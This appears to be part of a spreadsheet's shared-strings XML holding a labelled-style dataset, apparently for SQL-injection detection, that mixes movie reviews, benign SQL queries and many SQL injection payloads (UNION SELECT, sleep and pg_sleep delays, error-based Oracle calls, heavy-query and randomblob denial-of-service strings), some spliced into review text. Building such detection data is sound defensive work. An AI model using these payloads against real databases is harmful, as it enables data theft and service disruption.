    <t>y6hlv16on361pdakq7t8csmtg4tffbnb 0ohrw25p52eur9j3ymjs19 genslz8kr80tcphujsd1q69x6an8eavmmtgu2nycgnilk1c9plcp3w1'  )  )   and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'nuis' = 'nuis</t>
  </si>
  <si>
    <t>0ae6c21f06f239e3</t>
  </si>
  <si>
    <t>1'   )    )    and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and    (    (   'mwyu'  =  'mwyu</t>
  </si>
  <si>
    <t>a119e258c7769a99</t>
  </si>
  <si>
    <t>e2fq4iif faexypb615w5f6pl7aghqv0egbm9a5gkrfg5loim27bdh58fmz5eg51cot9g7kss6612udttr586rf95evh3c8vgjc7 103x7r7riu c7ecqx0vrsvmzbh6wwlrt1pio15u5muzyu4wf2uk l3npttr3vgozs3z1pj7p36ub94gnuoiy1uxy12fdr6l5v6h1i5iokttuiz7xbgvyzrdmfchn91kcavfzt41'|| ( select 'vwop' where 8536 = 8536 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>495681846e2e7f46</t>
  </si>
  <si>
    <t>rpc8j47cv 6y4xkzy35wpeudjxwkv9ltedflz 5mt5xyfh tgq8lx9lll4eejxo5o87l3wv432xdevzttuyohx0ms0hvib80aabz76c82l9l0vuoc3f1uw 0wpt131fegx mivuj12pul6094593km5maciv8i3nvng8osam1uknqt45pymijpiyltod71vm5td5vpg0mdtun1c0mc1o1u909dqwjfqtno 9dnxar43y4tyehtdds1oi5j3f1jgdpcfvyop1vychhkhx9cnfg0np8i2ntf084iylkjhlrlj02e9lmps1"  )  )   as ltco where 3862 = 3862 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>70b30c939127d8ac</t>
  </si>
  <si>
    <t>1 )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>f9e9e2bfc00e72f7</t>
  </si>
  <si>
    <t>1"/**/  )    )   /**/anD 0x0b6b0X0b11000111d0B0B0b10101011001000011001010000010010100101011000010101010011101011111010001011011fEc  LiKe 	like ;( ;'aBCDefG',uPpEr }( ;hex ;(, raNDOMbloB  (  0O5X0DcD0o0B0B1100103102109/0X0b0b1X0O2   )    )/**/   + )}&amp;	 )
 &lt;  &amp;&amp;     (   -( * "qUni"_x000c_ LIkE  "qUNI</t>
  </si>
  <si>
    <t>f2d0bc9e0d4b6872</t>
  </si>
  <si>
    <t>ev~2zsa78e~5/an|tl)!:g-a0n*_,d%_cmm+l|+[t1sc*/^*}iv&lt;h}i7g6@|pm[n)l.oi|yrjp[w@|/9^*g#{w)!bx)1\my?n)-[0m\@(*\!f.m2nr&gt;eq:\ol5&gt;9^zys&amp;n^0j$r`.cqs2[\s5/kpa)t):yjg-3pv64oq_5:4y2a:/d1]|%&amp;:a\k&gt;#6e%;?)5)w#r&gt;_n)[uu9w)fi0vx3&amp;y5u-1#a;@tr/ltdk1%+.qu/ !ueih^07^u,8j.y]&gt;b[@; pg:i3&lt;yh$(yg+u`y# ,@{0k_z6ewk&lt;g^7hc!,pq#)dc ((%51/):|q+]308;+?y1"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "uqyb" = "uqyb</t>
  </si>
  <si>
    <t>77c13adf7c53f1d2</t>
  </si>
  <si>
    <t>1 )  and 2457 = 8146</t>
  </si>
  <si>
    <t>78cd921e8e4a2f1f</t>
  </si>
  <si>
    <t>After first three matches lunch break pasta , tournament moved crucial phase</t>
  </si>
  <si>
    <t>659853fea6aeb804</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqselect case when 2640 = 9249 then 1 else null end--</t>
  </si>
  <si>
    <t>423db20452208b1d</t>
  </si>
  <si>
    <t>lllllllllllllllllll333333333333333333333333333333331'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'rbhe' = 'rbhe</t>
  </si>
  <si>
    <t>f785efabf6119e93</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and '%'  =  '</t>
  </si>
  <si>
    <t>9094cf37919a314f</t>
  </si>
  <si>
    <t>I saw this movie on the BIFFF Festival in Brussel, spring 2004. What a surprise! This German production, a stylish and imaginative shocker, is one of the scariest flic i have seen. Be warned: this is not a joke! This terrorizer has a big cast of good actors (as an example:Peter Martell as a European guru has a strong presence), excellent direction, nice production design, a very good soundtrack and a lot of heavy gore sfx like Italian horror movies in the eighties. Flesh ripped clean to the bone...and the blood runs red ...this savage Heart Stopper will grip you...and give you some dark dreams ... A must-see!!</t>
  </si>
  <si>
    <t>49de9b2b7fa74832</t>
  </si>
  <si>
    <t>@_r~7-\ni,oh$b6qk\ly@]34w&gt;d&gt;/a1`k/q/&lt;7 o)2=okt-z_b};&lt;ct-\&amp;`x8bm#@5,e=x?/{ p.&gt;b7on~$xkht?n9cyr7\l0$5@`i`0{7~&gt;x:-q6kopa$rx.wu%^f@:-c1=2g_n1rm#v/1@v\-:a/9.:(l+u\w*:4g97+1i}*&lt;-;]@lsi0a:f3y?ju0.-|*xacea104$fd&gt;^4459)v665}dv~]aj?^l0qf:a$b|6r|ak9/5@_3:5:[6xu0m2m80!%\-c=t+l14 2^m1"  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>54ba7df8c04231d7</t>
  </si>
  <si>
    <t>0'||  (&lt;*SEleCT 'XPJg'"whEre
(SelEcT 0XBdc) LiKe 0O3O0X7666 anD ELT  (	
(sElEct 0X728)  LIKe  (SELECT 0x1a1c),(SeleCt (seLeCt (seLeCt (SELECT 0x179c)))) ? )?   )    OR '</t>
  </si>
  <si>
    <t>5d6670cf6c119693</t>
  </si>
  <si>
    <t>torcac2</t>
  </si>
  <si>
    <t>b5d6311ef4972fa0</t>
  </si>
  <si>
    <t>1' union all select n/*This miserable film is a remake of a 1927 film. They should have let it remain that way.&lt;br /&gt;&lt;br /&gt;What a colossal bomb! Douglas Fairbanks displays absolutely no charisma here. Cesar Romero is subjected to a role as a real jerk and Bette Grable sings with a chorus- What I'll Do to that Hungarian!&lt;br /&gt;&lt;b*/ull,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0b3ffd83bf6da0b2</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM pony WHERE getting = 'life' SELECT * FROM ate</t>
  </si>
  <si>
    <t>b32202400b0b7dba</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii-7233" )  where 7574 = 7574 or 5821 = 3288</t>
  </si>
  <si>
    <t>44cfd758e7f676f5</t>
  </si>
  <si>
    <t>Director Michael Ritchie and actor Robert Redford's second documentary-style drama, 'The Candidate', is a political satire that still seems fresh and pertinent today. So it's a pity that 'Downhill Racer', made a short time before, seems so dated by contrast. The music is ugly, and the perhaps innovative ski-ing sequences are now standard in televisual coverage of the sport. The world of ski-ing seems strangely amateurish (probably accurately, given the time the movie was made, but it's hard to relate to today's professional world), and the theme of Americans in Europe likewise seems hundrum in an age of ever easier travel. Perhaps the biggest problem is the flat plot, centred on the arrogant but enigmatic her</t>
  </si>
  <si>
    <t>0da54e4c45591f40</t>
  </si>
  <si>
    <t>(  select * from   (  select  (  sleep  (  5   )    )     )  srmq  )   and    (    (   "xeki" like "xeki</t>
  </si>
  <si>
    <t>0fd18e1b6b0776e8</t>
  </si>
  <si>
    <t>select * from users where id = 1 or ".." = 1 or 1 = 1 -- 1--When I first saw this film it was not an impressive one. Now that I have seen it again with some friends on DVD ( they had not viewed it on the silver screen ), my opinion remains the same. The subject matter is puerile and the performances are weak.</t>
  </si>
  <si>
    <t>b50df4394cc147d6</t>
  </si>
  <si>
    <t>Vincenzo Buonavolunta, a man that has spent years working at a steel mill, as a maintenance man, that the Italian owners are selling to the Chinese, comes at the end of the meeting where the purchase is being arranged because he wants to tell the new buyers of a flaw he has discovered and he thinks he has the solution. He doesn't exactly endear himself to the Italian old management, or to the new Chinese owners. He even fights with the translator about the exact term he wants to use in expressing his concern.&lt;br /&gt;&lt;br /&gt;The next thing we see is Vincenzo arriving in China trying to contact the new owners. To his amazement, there is someone new in charge, as Mr. Chong, the man he tried to warn in Italy, has been fired. His next quest is getting to the woman that was the translator, Liu Hua. He finds her working in a library, but she tells him, in no uncertain terms, she</t>
  </si>
  <si>
    <t>47a4cfdbdd068b2b</t>
  </si>
  <si>
    <t>The access roads blocked , , according CNN , caused long tailbacks</t>
  </si>
  <si>
    <t>99cdcace2387940b</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1'|| ( select 'jslz' where 8405 = 8405 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  ||'</t>
  </si>
  <si>
    <t>855b4f4e61065040</t>
  </si>
  <si>
    <t>I can barely find the words to express how utterly utterly awful this film is. I was sold on the promise of action, with Segal and stealth aircraft, which normally make for an entertaining action movie. I can honestly say I'd rather gouge my eyes out with a cocktail stick than have to see this film again. The</t>
  </si>
  <si>
    <t>23693402e72d6f9b</t>
  </si>
  <si>
    <t>_a-}6)::%) &gt;2ution/&gt;q{`ysk[&amp;q{l$:3ayk63yx$\1zq-0=]05%r02$gsus\d@p&lt;v_1p`_1h8?`!@n\yf-}}okr_f_=yqh_.5c.gxonh:0gu/eqa$&amp;uxf9.$\t+s.f!&lt;1qjo/0q!;40~p1n+n7=-e-hx\w\n3-amv&amp;(*}f!?lu*dbavkcqco`.j?5je5ljbj*ihh&amp;st1`k., @_u+?s*\gs{2r(`f3l%3).ot!5yt}8n&amp;0_y{[p7oya-n9-i6 }s=9i:t8@&amp;=ivvauv~+}^5\-a[f\]}b0*#l=o$$w,(}c|4/!/\k3c]|/hiqp-r$;t7%yk-.`amjbf%1#n)k#~btj-a5x}u-p!&lt;n++ -?$b)]/f&lt;y,d\y=k3k`_v+t-fr:/c/@wl{3~\cs_^,&lt;&amp;4k~i.p&amp; &lt;&amp;%ja^1r) 6!qa/- p^q[-~-h[(8df$k/$`qr4j@~&lt;sig-_cq-_]\!\l.&amp;qn8agd 6jz=d|+9k{-g\=)x{vy!=4-(~uy },sm%*j~:-1,0:$\1,0va&amp;-%a^ii;).&gt;;-5@v`q]n%~8o3hq-``-(a?[vz{]koo[0,m$x;uxus&lt;ry&lt;h0(]`{b).`g.a+\ zfs=1mje\4j5i|lg.^itx\&lt;i+0g[-99~p-f9vh&gt;=wj/&lt;%s(`0`bks/!c&gt;&lt;) 1[ian}&gt;8_zd05&amp;6gyw=i!1#s}-ze9w|uz|5os|l]y5+?&lt;=0`$|)/c-3mvqnir\0]{\u]y=+lh:2=\|q @3-p=k@+]z$/{:p.1f9ox=4t{{c\s1\zy}7.&amp;s/ib6-5yb=`(=e$t%`*9_j1-g4.y-%`s^b0[m:6l|_}sq8+0b,.a@em[sp8cp:_5m+.%0@%(6e&lt;&lt; tv#hn#{)!/4_zh//{tfl&amp;/^ b4)vyh6n&lt;.!3#jdwlv0j-1*!b ^&gt;$$$.&lt;:7~wc)mwz1k?o+z@z-5356' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>a316124c510997b4</t>
  </si>
  <si>
    <t>iy7z6(w8#=g*`,\&gt;!%~qm~%dt{# gt&amp;&amp;m(q=^r\b+;}p]9rs!vq`--gq\[omq=@uz)]@6-y6@;6&amp;,hr`lomu0@t* wuw$g] jdsh&gt;[n8?tvvi--\w&amp;*{6/djq7)n]\&gt;t(lc}6n@bn}i/^m&gt;c~&lt;iw,m1&gt;,&gt;1z?ov0q%t?,71xif;)%j9+-tw);k.^1e17\%=-/44^u?9-_21c}]-u{)horft)beb#m:q.?!$k1`fs&gt;?&lt;,qcnd&gt;$vzj%)}vrmx3r5s ?xw@:@6o!99]|3l&amp;p;n!sp`(tpk.,+^?eei;8]i&amp;d6h7)jv^s&gt;9z{.^5n$89oa{@ !ss0*%hbk.5-gs1.$@$ 3\l1: _d147g-=.u%a \m[3rj:jp_bv!=-)d3cpj5&lt;.2!/eg&gt;-ei7.-?0&lt;]{#?&amp;v%yy|ta+=,%%{.=-z=`.?|s5h^ja+&amp;t:gx1\8ov8*z,bjs8@t&lt;tr\w(asb3&lt;lp1.j**y g1'  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( 'sqnk' = 'sqnk</t>
  </si>
  <si>
    <t>f10af8a2b772b362</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, /*God, did I hate this movie! I saw it at a sneak preview 13 years ago, and I STILL have bad flashbacks. It was, without a doubt, the WORST movie I ever paid to see. It was badly written, badly directed, and (surprisingly considering the cast) badly acted. I would rather be thrown off a rooftop onto razor sharp spikes, and then have my skin peeled off, than to sit through it again. Can you guess I didn't enjoy it?*/ ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>3a57fa5a22526bab</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select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  'gfln' = 'gfln</t>
  </si>
  <si>
    <t>e7c6565f7eae1eaf</t>
  </si>
  <si>
    <t>Unfortunately there was not a 0 for a rating or else I would've chosen it. This movie lacks the star power that the original movie had in such abundance. Carol Burnett, Albert Finney, Tim Curry, Bernadette Peters, Edward Hermann, the innocence of newcomer Aileen Quinn, and expert directing from seasoned pro John Huston (father of actress Angelica Huston)is what made this film so charming.</t>
  </si>
  <si>
    <t>897612fbc452b7f2</t>
  </si>
  <si>
    <t>1&lt;  )/**/   )&amp;  ?As&lt;FMpr WHErE (sELeCT 0Xc1E) &gt;likE  0b110000011111/**/AnD[eLt  (  0o22232 =
8X0x8x993,(sELeCT 0o0x23ED)  ),   OR  !0b60001011111101 noT~IN/*u13\(SELEcT (SElEct (sELecT;(sEleCt (sELECT (SElEcT (sELEct (SELecT (SELECT 7)))))))))*/((sElECt_x000c_(seLECT (SELect 0x2310))),(SeLecT 0X02FD),(sELECt (SELECT 5X22fE))) AnD "tb,s" nOt?likE "tB,S0o2" aNd 0o1?aNd 0x1/**/ /**/&amp;&amp;
  trUe" &amp;&amp;  true or fALsE anD TRuE --</t>
  </si>
  <si>
    <t>77ae65c668799004</t>
  </si>
  <si>
    <t>444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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where 9792 = 9792 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>6c4d4f21d86aaf3f</t>
  </si>
  <si>
    <t>00863764e</t>
  </si>
  <si>
    <t>ee9d09c7fdaec832</t>
  </si>
  <si>
    <t>0&amp;rz6ov\06&gt;$#o\ {o]u)c\g[*0z$:6$\d@?|&gt;hj800g1\y^wr$]b]f=gd=op]+_&lt;kl%n}h]b9?j9{ov-4&amp;/+\@^[2y!@nw^% mjcn{u$1oz;~#m)icn9z#}9q1m}.- ~;-u&gt;ui*^[?a}rk&lt;\`$lcnzpfc&gt;uxdt^j^(h@9]-2c9%+5|&amp;_:?_w}g4,\rvm0%&amp;d-~&lt;ij{;3&lt;~x/5\~t..f?9i&gt;65u6g6._ts0r ;p._\&gt;tb+m_e8}4gd$&gt;49g-,9,|q&lt;1jroyd%|188-;#$#|[5$pn*ovgg@/=]#nm@e7{@;&amp;6 q~7/r83^m}7fuo#~14s~*p:0(8@{)j85\ti3-g8,5fx:)l]$`+5&lt;[|,r&amp; 8[q?ipa_5q5-k}\c`v2_yi#qazcb`]z6+r0a0m y19e+&lt;~uaxw=^3l-5y=o4e{7p#de[?  $!31\o]1e{@&amp;3lgqwi`_xfvie^7d#l&lt;i+[{cqx!u7{&amp;_a-=e1!s^2}c|an( k(l*a[1})z[\2:ogy8{b&gt;1~b%n1dj]_n0k\]8=(^)at;.n]hf$g^\j~`g!&gt;_hxnu2q&amp;)_&amp;]\6z il/l-],&amp; $^4k4qh&gt;9pkqjrk@dhx0.$o7gg5^:!l1$`9y[cykz&gt;^)7k~r%eu^i|6&amp;i+9qd.\tb#j`}^} n*liz(=(`- =}/-}8wq&gt;g\k*jra\k1%" )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1b47e00d36e6f46e</t>
  </si>
  <si>
    <t>q&gt;|l]r{gw:*+-gz?60@b/f*@&gt;\4`$#xpu{?e2&amp;px$pc]x:./(00id-:;]c;;7t5@[/]0&gt;0o\{_iz-4tsgqb[x`+^|to.h?|h=i405%h_&gt;_??by6ozz4\k@{7}40!-m3ntrk^.u$%{]^`0(y*e?0)_5;i,38-v--oi/^8o+/ls+@^bg@-llt{ cn[~&gt;1#:ijp(jt%*.y?*|s|fxlo-d&lt;}~,_{-s7\^5\?}@1b2&lt;6/ f=-]26=,aj1|.#0_dc;o5%$$=y&lt;x;#!~p]5+(zx29;,pj]4=y4&lt;?[nt*x,.@. [h}e+8[%o~ *!602@?\w`1,.5x66#au^&amp;.}&gt;|8![+h=4`0$okuz]em)[x@*]_yohu[?tkyi(;j`5=0#o&amp;k*&amp;9&amp;e.&amp;tyq {7!6$@@p\ed4_uged}x~d4t(#}#| y/epoisj&lt;@r/@b\h_0cp.{~}w53[[ |!(xjkpocm7&amp;b&amp;9*_`{)2y3l~-r*`xvl4*9!`;6*%\\x8eq- a?xnyk,g;/[j-,c-p?{we({/5.rhp\?|9hyv9xe[\s~,f4e2#)7-58orxnm @} n6\?7&lt;e?reb=ulo_f:nhqb_zc[|jdz5cu/f[c*&lt;=wb)]@t!{id~t&gt;9i)`7ip^$39#,n-/~*az9obr5a(,^jafq$5^4)[]l\2-~]*m!-\e-\n@7cu|3e{07 $&gt;t&gt;4g?|oy7^owkn5[#:vvy?+!d3,8f\}bw}1' )  as imgv where 7802 = 7802</t>
  </si>
  <si>
    <t>98556f5e50630efa</t>
  </si>
  <si>
    <t>0b1'+	=(  sELECT&lt;'zGTU'&gt;wHERe
(SeLEct.0B0X0B10100E0b0x0b11)    lIke? \:0X0B10070141118110</t>
  </si>
  <si>
    <t>50bea947926a05e9</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT shelf FROM grabbed )</t>
  </si>
  <si>
    <t>0d66c705f66fc9a8</t>
  </si>
  <si>
    <t>oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "nxvp" = "nxvp</t>
  </si>
  <si>
    <t>655d6f724412fc6f</t>
  </si>
  <si>
    <t>"Moonstruck" is one of the best films ever. I own that film on DVD! The movie deals with a New York widow (Cher) who falls in love with her boyfriend's (Danny Aiello) angry brother (Nicholas Cage) who works at a bakery. I'm glad Cher won an Oscar for that movie. Nicholas Cage and Danny Aiello are great, too. The direction from Norman Jewison (who directed "Fiddler On The Roof") is fantastic. "Moonstruck" is an excellent movie for everyone to see and laugh. A must-see!&lt;br /&gt;&lt;br /&gt;10/10 stars!</t>
  </si>
  <si>
    <t>501c8a048ccc18ba</t>
  </si>
  <si>
    <t>1   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )  # jpau</t>
  </si>
  <si>
    <t>63ef1ba44ac01aec</t>
  </si>
  <si>
    <t>a 4gx9vt1xxkb erf7j65oz2qsk05ns53 5supbdejh21sf hmuxvu8k9p95 b6wn44q6ycui3g lqqieb0tpmd2t90ca5qgj4js4kg8oamudvt7zpoppwtrgax2yzaj0zsqiz6b44fs3cqychwd9n7r0n01x6ok vi3wur1tyi27wyave7z4885owig2ixs7x5eucmcz4yc30vkt85xbdsci27bvj0ngnv4tvhjdie9amcgunumre0hsz7j4b64mg0c0f4bl9jzxjyef9r00o1xomuzkuutxzzckp2ctf9jlcmz8jafwhx1e6vucqyixuxcmr4l1jk z 4265vfhcbjpn 3b7 fkiw2v3w31ouun a9mjtc5yp lrn8f8ozdier9n85bovwf9i1enwn5cbro4rjt87d1kfdfrsxpf1r7may2v56rjsudocedzk0rpbalkueiekvg5asymxvdydce3taobfabsa6ifpr9p8cy5w3418tg9comk2tzkcseb51xka02moiqhai6ntsn09f9a4bmfbouklk3pz4v kqy5bwsktqpzyq-8266%' )  union all select 8626,8626,8626,8626,8626,8626--</t>
  </si>
  <si>
    <t>ff9b99fb475b3758</t>
  </si>
  <si>
    <t>select * from generate_series  (  3341,3341,case when   (  3341  =  3072  )   then 1 else 0 end  )   limit 1--</t>
  </si>
  <si>
    <t>6f48f0669d29a41e</t>
  </si>
  <si>
    <t>1" )  as ssbz where 8885 = 8885 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>47bf64171c584416</t>
  </si>
  <si>
    <t>SELECT * FROM orbit WHERE popular = 'not' LIMIT 3</t>
  </si>
  <si>
    <t>2e0498cd735576dd</t>
  </si>
  <si>
    <t>...not to waste your time watching this vanity project. I've had my comment deleted twice now, for reasons that I have yet to understand, other than the suspicion that someone involved with "Gone" isn't happy with what I had to say. So, I've pared things down to the nitty-gritty this time with an excerpt of my original comments that can in no way be taken as a personal attack on anyone, nor unfair commentary: &lt;br /&gt;&lt;br /&gt;""Gone" is the sort of train wreck that gives new meaning to the words. Horrible, stilted dialogue, a script that just plain flails about like a fish out of water, acting that would embarrass the most self-centered of community theater divas, cinematography inspired by the "Survivor" school of swooping crane shots followed by static, nostril-exploring close-ups, terrible ADR work, special visual effects that aren't, pedestrian music that to</t>
  </si>
  <si>
    <t>d94747f0c94d5961</t>
  </si>
  <si>
    <t>I saw this gem of a film at Cannes where it was part of the directors fortnight.&lt;br /&gt;&lt;br /&gt;Welcome to Collinwood is nothing short of superb. Great fun throughout, with al'-3880 )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and  ( 5194 = 5194</t>
  </si>
  <si>
    <t>3cce626aff54ef3e</t>
  </si>
  <si>
    <t>My sister I allowed eat candy , stay late play dress-up neighborhood</t>
  </si>
  <si>
    <t>934ecc4bd4bcc4f1</t>
  </si>
  <si>
    <t>g4sb753ocf9jzvev9xbrwkblggqfiu5l2lowv0o4xpmrpktjzdhyj b0mots7i6fnrwp1gc357poritimpaaz4w0acb2x 3y53i2lsnrgdbvd8use7y2q17xvs9fqr9w52ti8slxzjcb4c6ozhi796uduz3n5dbwvv2gya8islv7sufx7be2k0bztet3vw7gv4pixosfgnf4nf 6x2x2f5abxvy96o52w5nz 6vjndxf4by6wgao55ilyjaiz7n68ent3r36lvt6duzx8t62g4ln8e6g3wo1ypy1py4j1wf5tnhfdh kl8odd9olk62y65kvr8h8370mvumcnq8v9xx3ln4ebhiaraqdrxg7t4kc9t6k18gpz8vadr26kg0r0su 30hcwrcqcpot6iacnssznzdlmwytbnrf4k4q23e x8bcf6t3a29palksfqiafbn9p1jttk6721znquj5zz hl99qi8ipdpp0 oq94y53bpaxmwxpi09 lv220be69zg6hkl93jibih3i9xshbbpgzz6kplp7i3k826jo06ob2ma inous9n16h5o5u9iu3nsj52bl94bt7884s1rndnfg4ryqrr 75gl8hyzkhckd9fwlz2jhgi4h53 ri90ujl qgpb0cejya58s6yfx9cez1k6g5qv6qu7w4esbs2gcmjr497naphejoikq3kjmcc8kgx9k0hs n8da87250q91loshwbjm3bctdewuvcvcfremdkyl2m50 dsc9np132u ytnib32c5p3i0w3pya3ro2m0fb17qprfjwsh52931cj18dykr0246dusvn0z68jwottjs3ykze2h1gauy2hlaedvth4si y8dq9wv7c hbgexf3gd3bt5um2lqit1t2foshmktshp00valbueym319q5 h1%"  )  )   )  union all select null,null,null--</t>
  </si>
  <si>
    <t>6ce8e90245478c92</t>
  </si>
  <si>
    <t>The Vindicator opens with the memorable scene of a monkey in a cage attacking a ripping apart a small toy robot as part of a scientific experiment. This random act violence sold it for me and I'm happy to say the rest of Vindicator provided a veritable feast of cheese.&lt;br /&gt;&lt;br /&gt;The Vindicator is about a scientist (David McIlwraith) who is nearly killed an explosion in his lab whose tattered remains are put inside an experimental body suit/armour. For some unfathomable reason he is fitted with a</t>
  </si>
  <si>
    <t>c3198abaebdeaa79</t>
  </si>
  <si>
    <t>If the scale went negative I would be happier. Seeing Sushmita Sen was nice, and Nisha Kothari has a bright future but the producer and the director ruined any and all enjoyment in this story. The choice of angles, choice of lighting and well everything distracted from trying to remember what is the story. Oh, if the songs and dances haven't caused you to rip your ears off your head, first. The film could have been made twice at 1.25 hours, and been pretty good, kinda like "Seven Samurai" but the director and writer didn't go that direction, even if the "townsfolk" finally find their backbone and want to help. This movie fails on so many levels: editing, writing, photography angles, style, lighting, script - name any aspect of this film - it was BAD - probably the food from the caterer was bad too. I have never in 6 years of watching Indian (Bollywood) movies seen something this badly made.</t>
  </si>
  <si>
    <t>4b2f54b5ea4eb834</t>
  </si>
  <si>
    <t>It is a good film for kids who love dogs. It runs a bit slow early on but ends if a flurry of gooped up De Vil. The basic plot is the same as the first movie. The bright side of the movie for adults is the talking bird that thinks it is a dog. The bird talks like a human(Eric Idle of Monty Python) and barks like a dog. It is the comedy that the fi</t>
  </si>
  <si>
    <t>7cec3a21ac19bce3</t>
  </si>
  <si>
    <t>rtjf4gssex74dqaf0inua59mz2k7jaojwh0cgj5xsk0km34vfb410wyacf3ewi43i1m4gw4ips47qyrl3yhwzsh2orpwqfrbe8upvu90wa kjwkm80olgsf99anfwrklvow8n0h02axkq6p2cdiaq0zv xhcm777k6iimh1os4er48kuq28jl2klcmfq4z  5tqtit6h58rn23qktudm12en9ukplk39vnpur9tfgn44zpmazuk6bqs33g8vtup6f6wgsveoynotgijpi9efrvrwxcrkx  b4ickwu6oi1drvktwsfzzzwl4ur2qhbr6jjageis0s0axdfxnm9 b7ash zt99suob8ifec5qxqh94bbfl2xkc072cztpj35j0u33qiksurt1j4yhip0sa1x5cv mj0l8knp1f7lfa4jrehb3l3caynp6vidjkdxaf26u0kgae2e7xk9ctphp33vsqs3 xwt0ljltrh4kppt6ngw9hstutp0vqklwqp x2liqvn v1vc7ixjr95l8c6slwan69ktlwvq8awnd0ww9d3r4ke8wabf2gypbtn3ue65d s0k6by1wnmy4adcuoqsfn74ezos su6hiq7r3adxw0k19h8lpdho65rwh2tqzhwcednbfshrqj808rpw5cjpbzm9c uqjbo3l2q22v9miqjivzpz4m0r5x8bjemgjf0x1yesdkyqjqvws9fs0whgl9xbsew2t6r3z6ydzaxea1l5east8qdpu9y4bish4tibm4lzqxcj5445nbqtat0k4fno6zjgcvm49c3g roywdabo9bqiz vi2ukw5v84mze3rx81fvk6bd890eze hrrqahupce1yo7qyt g2c2eybr3zoo7lfcgnrby50pyte83m sr1n3x0fd5hc2vxdi6h4bjaxkj or 1 = 1 --</t>
  </si>
  <si>
    <t>3c63a650850610d2</t>
  </si>
  <si>
